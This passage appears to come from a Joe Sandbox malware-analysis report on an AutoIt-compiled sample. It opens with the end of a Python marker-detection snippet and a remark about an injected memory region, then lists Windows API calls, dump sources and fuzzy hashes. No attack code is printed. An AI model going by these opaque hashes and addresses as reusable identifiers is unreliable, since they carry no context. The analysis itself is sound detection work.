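    print('AutoIt runtime markers present:', looks_like_autoit(sample))
```

Note that `#include` also matches inside `#include-once`, so a hit count should be read as distinct markers rather than as evidence of distinct strings; on a real dump, point `find_markers` at the `.sdmp` bytes of the 00880000 image region listed above rather than at the injected 01100000 region, whose blocks carry no strings at all.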
                              APIs
                              • GetSysColor.USER32(00000012), ref: 0090AB99
                              • SetTextColor.GDI32(?,?), ref: 0090AB9D
                              • GetSysColorBrush.USER32(0000000F), ref: 0090ABB3
                              • GetSysColor.USER32(0000000F), ref: 0090ABBE
                              • CreateSolidBrush.GDI32(?), ref: 0090ABC3
                              • GetSysColor.USER32(00000011), ref: 0090ABDB
                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0090ABE9
                              • SelectObject.GDI32(?,00000000), ref: 0090ABFA
                              • SetBkColor.GDI32(?,00000000), ref: 0090AC03
                              • SelectObject.GDI32(?,?), ref: 0090AC10
                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0090AC2F
                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0090AC46
                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0090AC5B
                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0090ACA7
                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0090ACCE
                              • InflateRect.USER32(?,000000FD,000000FD), ref: 0090ACEC
                              • DrawFocusRect.USER32(?,?), ref: 0090ACF7
                              • GetSysColor.USER32(00000011), ref: 0090AD05
                              • SetTextColor.GDI32(?,00000000), ref: 0090AD0D
                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0090AD21
                              • SelectObject.GDI32(?,0090A869), ref: 0090AD38
                              • DeleteObject.GDI32(?), ref: 0090AD43
                              • SelectObject.GDI32(?,?), ref: 0090AD49
                              • DeleteObject.GDI32(?), ref: 0090AD4E
                              • SetTextColor.GDI32(?,?), ref: 0090AD54
                              • SetBkColor.GDI32(?,?), ref: 0090AD5E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                              • String ID:
                              • API String ID: 1996641542-0
                              • Opcode ID: 975ddcfbf92b54ebb11db7a843ffa0002435c2f89e53bcdaae0e801bb36901f5
                              • Instruction ID: 02a87acc70f62f18426c1a9d3d9d880ca111ebee45f6c46f48de80e0c9cd9a0f
                              • Opcode Fuzzy Hash: 975ddcfbf92b54ebb11db7a843ffa0002435c2f89e53bcdaae0e801bb36901f5
                              • Instruction Fuzzy Hash: E3615D71904218EFDF219FA8DC48EAE7BB9EF08320F114525F915AB2E1D6759A40EB90
                              APIs
                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00908D34
                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00908D45
                              • CharNextW.USER32(0000014E), ref: 00908D74
                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00908DB5
                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00908DCB
                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00908DDC
                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00908DF9
                              • SetWindowTextW.USER32(?,0000014E), ref: 00908E45
                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00908E5B
                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00908E8C
                              • _memset.LIBCMT ref: 00908EB1
                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00908EFA
                              • _memset.LIBCMT ref: 00908F59
                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00908F83
                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00908FDB
                              • SendMessageW.USER32(?,0000133D,?,?), ref: 00909088
                              • InvalidateRect.USER32(?,00000000,00000001), ref: 009090AA
                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 009090F4
                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00909121
                              • DrawMenuBar.USER32(?), ref: 00909130
                              • SetWindowTextW.USER32(?,0000014E), ref: 00909158
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                              • String ID: 0
                              • API String ID: 1073566785-4108050209
                              • Opcode ID: 67250fd3747298cd9b47a4b65f51280d1cc45c6d88f8831fea2e31c015f3ef65
                              • Instruction ID: b2e9ae9ef2b3d0023e8aca059dc1e97f2696649d9b3f1b09a43617cb080eeded
                              • Opcode Fuzzy Hash: 67250fd3747298cd9b47a4b65f51280d1cc45c6d88f8831fea2e31c015f3ef65
                              • Instruction Fuzzy Hash: E0E1AD71A04219AEDF209F64CC88EEF7BB9FF05710F008259F955AA2D1DB748A81DF61
                              APIs
                              • GetCursorPos.USER32(?), ref: 00904C51
                              • GetDesktopWindow.USER32 ref: 00904C66
                              • GetWindowRect.USER32(00000000), ref: 00904C6D
                              • GetWindowLongW.USER32(?,000000F0), ref: 00904CCF
                              • DestroyWindow.USER32(?), ref: 00904CFB
                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00904D24
                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00904D42
                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00904D68
                              • SendMessageW.USER32(?,00000421,?,?), ref: 00904D7D
                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00904D90
                              • IsWindowVisible.USER32(?), ref: 00904DB0
                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00904DCB
                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00904DDF
                              • GetWindowRect.USER32(?,?), ref: 00904DF7
                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00904E1D
                              • GetMonitorInfoW.USER32(00000000,?), ref: 00904E37
                              • CopyRect.USER32(?,?), ref: 00904E4E
                              • SendMessageW.USER32(?,00000412,00000000), ref: 00904EB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                              • String ID: ($0$tooltips_class32
                              • API String ID: 698492251-4156429822
                              • Opcode ID: 0d6e6aaf2b4b7e402501b3f8557e43b9e1078bf73cfe4ba488d6e5e783f7e6a0
                              • Instruction ID: ecc72c6dcd6cf85c512f67002a89b7531200fd950c0c56eb3c34ed51c2b5c3d2
                              • Opcode Fuzzy Hash: 0d6e6aaf2b4b7e402501b3f8557e43b9e1078bf73cfe4ba488d6e5e783f7e6a0
                              • Instruction Fuzzy Hash: 0BB18CB1608341AFDB14DF28C944B6ABBE5FF84714F00891CF6999B2A1DB71ED05CB92
                              APIs
                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008828BC
                              • GetSystemMetrics.USER32(00000007), ref: 008828C4
                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008828EF
                              • GetSystemMetrics.USER32(00000008), ref: 008828F7
                              • GetSystemMetrics.USER32(00000004), ref: 0088291C
                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00882939
                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00882949
                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0088297C
                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00882990
                              • GetClientRect.USER32(00000000,000000FF), ref: 008829AE
                              • GetStockObject.GDI32(00000011), ref: 008829CA
                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 008829D5
                                • Part of subcall function 00882344: GetCursorPos.USER32(?), ref: 00882357
                                • Part of subcall function 00882344: ScreenToClient.USER32(009467B0,?), ref: 00882374
                                • Part of subcall function 00882344: GetAsyncKeyState.USER32(00000001), ref: 00882399
                                • Part of subcall function 00882344: GetAsyncKeyState.USER32(00000002), ref: 008823A7
                              • SetTimer.USER32(00000000,00000000,00000028,00881256), ref: 008829FC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                              • String ID: AutoIt v3 GUI
                              • API String ID: 1458621304-248962490
                              • Opcode ID: d8350f3bde4c4141a039560fc78bb3cc48480201f03d476da7fe703ea78a728c
                              • Instruction ID: 61d630acc803f640ddead317c8e8aa47f3b3ad750edc068a9a3079d88303e833
                              • Opcode Fuzzy Hash: d8350f3bde4c4141a039560fc78bb3cc48480201f03d476da7fe703ea78a728c
                              • Instruction Fuzzy Hash: 8AB18D71A0420AAFDB24EFA8DC55BEE7BB4FB08714F108129FA15E7390DB70A940DB51
                              APIs
                              • CharUpperBuffW.USER32(?,?), ref: 009040F6
                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 009041B6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: BuffCharMessageSendUpper
                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                              • API String ID: 3974292440-719923060
                              • Opcode ID: 7b11811a66840e1fa680027bac051d8b98aecf3c106584f9e5679ef360bbbcec
                              • Instruction ID: d549074ab95933950d000a9aff0f9a340af5aa2d36d0cb01fe9245d51c6fe7cc
                              • Opcode Fuzzy Hash: 7b11811a66840e1fa680027bac051d8b98aecf3c106584f9e5679ef360bbbcec
                              • Instruction Fuzzy Hash: 37A18DB12143019FCB14EF28C992A6AB3E5FF84314F144969F9A69B7D2DB34EC05CB42
                              APIs
                              • LoadCursorW.USER32(00000000,00007F89), ref: 008F5309
                              • LoadCursorW.USER32(00000000,00007F8A), ref: 008F5314
                              • LoadCursorW.USER32(00000000,00007F00), ref: 008F531F
                              • LoadCursorW.USER32(00000000,00007F03), ref: 008F532A
                              • LoadCursorW.USER32(00000000,00007F8B), ref: 008F5335
                              • LoadCursorW.USER32(00000000,00007F01), ref: 008F5340
                              • LoadCursorW.USER32(00000000,00007F81), ref: 008F534B
                              • LoadCursorW.USER32(00000000,00007F88), ref: 008F5356
                              • LoadCursorW.USER32(00000000,00007F80), ref: 008F5361
                              • LoadCursorW.USER32(00000000,00007F86), ref: 008F536C
                              • LoadCursorW.USER32(00000000,00007F83), ref: 008F5377
                              • LoadCursorW.USER32(00000000,00007F85), ref: 008F5382
                              • LoadCursorW.USER32(00000000,00007F82), ref: 008F538D
                              • LoadCursorW.USER32(00000000,00007F84), ref: 008F5398
                              • LoadCursorW.USER32(00000000,00007F04), ref: 008F53A3
                              • LoadCursorW.USER32(00000000,00007F02), ref: 008F53AE
                              • GetCursorInfo.USER32(?), ref: 008F53BE
                              • GetLastError.KERNEL32(00000001,00000000), ref: 008F53E9
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Cursor$Load$ErrorInfoLast
                              • String ID:
                              • API String ID: 3215588206-0
                              • Opcode ID: c5cbc4028dbc27e231685cb90fbe8f03f27514e7a45555bfc77d7aed2a4f8cf5
                              • Instruction ID: 6a7ece479e581dd502185d09175c62c427cc97311b1547367873f51e6ba31595
                              • Opcode Fuzzy Hash: c5cbc4028dbc27e231685cb90fbe8f03f27514e7a45555bfc77d7aed2a4f8cf5
                              • Instruction Fuzzy Hash: 97417670E043196ADB109FBA8C49C6EFFF8FF51750B10452FE609E7290DAB855008E65
                              APIs
                              • GetClassNameW.USER32(?,?,00000100), ref: 008DAAA5
                              • __swprintf.LIBCMT ref: 008DAB46
                              • _wcscmp.LIBCMT ref: 008DAB59
                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 008DABAE
                              • _wcscmp.LIBCMT ref: 008DABEA
                              • GetClassNameW.USER32(?,?,00000400), ref: 008DAC21
                              • GetDlgCtrlID.USER32(?), ref: 008DAC73
                              • GetWindowRect.USER32(?,?), ref: 008DACA9
                              • GetParent.USER32(?), ref: 008DACC7
                              • ScreenToClient.USER32(00000000), ref: 008DACCE
                              • GetClassNameW.USER32(?,?,00000100), ref: 008DAD48
                              • _wcscmp.LIBCMT ref: 008DAD5C
                              • GetWindowTextW.USER32(?,?,00000400), ref: 008DAD82
                              • _wcscmp.LIBCMT ref: 008DAD96
                                • Part of subcall function 008A386C: _iswctype.LIBCMT ref: 008A3874
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                              • String ID: %s%u
                              • API String ID: 3744389584-679674701
                              • Opcode ID: 37277c846da5005af0a98e643b26b9e62b540a83b39f783d7f991c61f070e49b
                              • Instruction ID: 9ef6675515b9d8fdc322a155b7a55c0cf451d7ceaf7be71554cb61821c79a467
                              • Opcode Fuzzy Hash: 37277c846da5005af0a98e643b26b9e62b540a83b39f783d7f991c61f070e49b
                              • Instruction Fuzzy Hash: C3A1D671204706AFDB18DF24C884FAAB7E9FF04355F20472AF999D2651DB30EA45CB92
                              APIs
                              • GetClassNameW.USER32(00000008,?,00000400), ref: 008DB3DB
                              • _wcscmp.LIBCMT ref: 008DB3EC
                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 008DB414
                              • CharUpperBuffW.USER32(?,00000000), ref: 008DB431
                              • _wcscmp.LIBCMT ref: 008DB44F
                              • _wcsstr.LIBCMT ref: 008DB460
                              • GetClassNameW.USER32(00000018,?,00000400), ref: 008DB498
                              • _wcscmp.LIBCMT ref: 008DB4A8
                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 008DB4CF
                              • GetClassNameW.USER32(00000018,?,00000400), ref: 008DB518
                              • _wcscmp.LIBCMT ref: 008DB528
                              • GetClassNameW.USER32(00000010,?,00000400), ref: 008DB550
                              • GetWindowRect.USER32(00000004,?), ref: 008DB5B9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                              • String ID: @$ThumbnailClass
                              • API String ID: 1788623398-1539354611
                              • Opcode ID: 142a726ae5081e34633de3e845aeb76abe2051134246f51b63f1d658e2d08da1
                              • Instruction ID: ee4b2954f48f161b645e2de6d9be8a9b132019ce14e717b729c84051d4e09489
                              • Opcode Fuzzy Hash: 142a726ae5081e34633de3e845aeb76abe2051134246f51b63f1d658e2d08da1
                              • Instruction Fuzzy Hash: D181AD71008209DBDB14DF14D885FAA77E8FF54714F08866AFD85CA292DB30DE45CB62
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __wcsnicmp
                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                              • API String ID: 1038674560-1810252412
                              • Opcode ID: 2bab5b5030cf63ec4bae2766e8d1a70acd1fea92a49a63a8240d0cdec71de75e
                              • Instruction ID: d43fd4d000b27aeea4a115d9477fc9671c0b5b788c795ac01f706672b71fb598
                              • Opcode Fuzzy Hash: 2bab5b5030cf63ec4bae2766e8d1a70acd1fea92a49a63a8240d0cdec71de75e
                              • Instruction Fuzzy Hash: 7831A236944209E6DB14FA64CD83FEE77B4FF14758F60012AB441F15D5EFA1AE04CA52
                              APIs
                              • LoadIconW.USER32(00000063), ref: 008DC4D4
                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 008DC4E6
                              • SetWindowTextW.USER32(?,?), ref: 008DC4FD
                              • GetDlgItem.USER32(?,000003EA), ref: 008DC512
                              • SetWindowTextW.USER32(00000000,?), ref: 008DC518
                              • GetDlgItem.USER32(?,000003E9), ref: 008DC528
                              • SetWindowTextW.USER32(00000000,?), ref: 008DC52E
                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 008DC54F
                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 008DC569
                              • GetWindowRect.USER32(?,?), ref: 008DC572
                              • SetWindowTextW.USER32(?,?), ref: 008DC5DD
                              • GetDesktopWindow.USER32 ref: 008DC5E3
                              • GetWindowRect.USER32(00000000), ref: 008DC5EA
                              • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 008DC636
                              • GetClientRect.USER32(?,?), ref: 008DC643
                              • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 008DC668
                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 008DC693
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                              • String ID:
                              • API String ID: 3869813825-0
                              • Opcode ID: 1c24ee73453f9ae533bf0ced183e558546911be89e29a0e7a412979fe0b21c75
                              • Instruction ID: 3e1698d8fcc4a92b46c806ad81f428a6fd88cc09e9944696e903430285d018d5
                              • Opcode Fuzzy Hash: 1c24ee73453f9ae533bf0ced183e558546911be89e29a0e7a412979fe0b21c75
                              • Instruction Fuzzy Hash: 20516E7190070AAFDB20DFA8DD85B6EBBF5FF04705F004A29E686E26A0C775E904DB50
                              APIs
                              • _memset.LIBCMT ref: 0090A4C8
                              • DestroyWindow.USER32(?,?), ref: 0090A542
                                • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0090A5BC
                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0090A5DE
                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0090A5F1
                              • DestroyWindow.USER32(00000000), ref: 0090A613
                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00880000,00000000), ref: 0090A64A
                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0090A663
                              • GetDesktopWindow.USER32 ref: 0090A67C
                              • GetWindowRect.USER32(00000000), ref: 0090A683
                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0090A69B
                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0090A6B3
                                • Part of subcall function 008825DB: GetWindowLongW.USER32(?,000000EB), ref: 008825EC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                              • String ID: 0$tooltips_class32
                              • API String ID: 1297703922-3619404913
                              • Opcode ID: a26b37ac315b4ce7b22cbbba19c0888497aa926eedc4e47861e643298db2ca1f
                              • Instruction ID: fe9d15dacaf969aafb57446fc33cd2e735bbf38ab3660b1a37169c15114ce4de
                              • Opcode Fuzzy Hash: a26b37ac315b4ce7b22cbbba19c0888497aa926eedc4e47861e643298db2ca1f
                              • Instruction Fuzzy Hash: 6A718671154305AFD720CF28CC49F6A7BFAFB89304F080928F985872A1C772A942DB92
                              APIs
                                • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                              • DragQueryPoint.SHELL32(?,?), ref: 0090C917
                                • Part of subcall function 0090ADF1: ClientToScreen.USER32(?,?), ref: 0090AE1A
                                • Part of subcall function 0090ADF1: GetWindowRect.USER32(?,?), ref: 0090AE90
                                • Part of subcall function 0090ADF1: PtInRect.USER32(?,?,0090C304), ref: 0090AEA0
                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0090C980
                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0090C98B
                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0090C9AE
                              • _wcscat.LIBCMT ref: 0090C9DE
                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0090C9F5
                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0090CA0E
                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0090CA25
                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0090CA47
                              • DragFinish.SHELL32(?), ref: 0090CA4E
                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0090CB41
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                              • API String ID: 169749273-3440237614
                              APIs
                              • CharUpperBuffW.USER32(?,?), ref: 009046AB
                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 009046F6
                              Strings
                              Similarity
                              • API ID: BuffCharMessageSendUpper
                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                              • API String ID: 3974292440-4258414348
                              APIs
                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0090BB6E
                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00906D80,?), ref: 0090BBCA
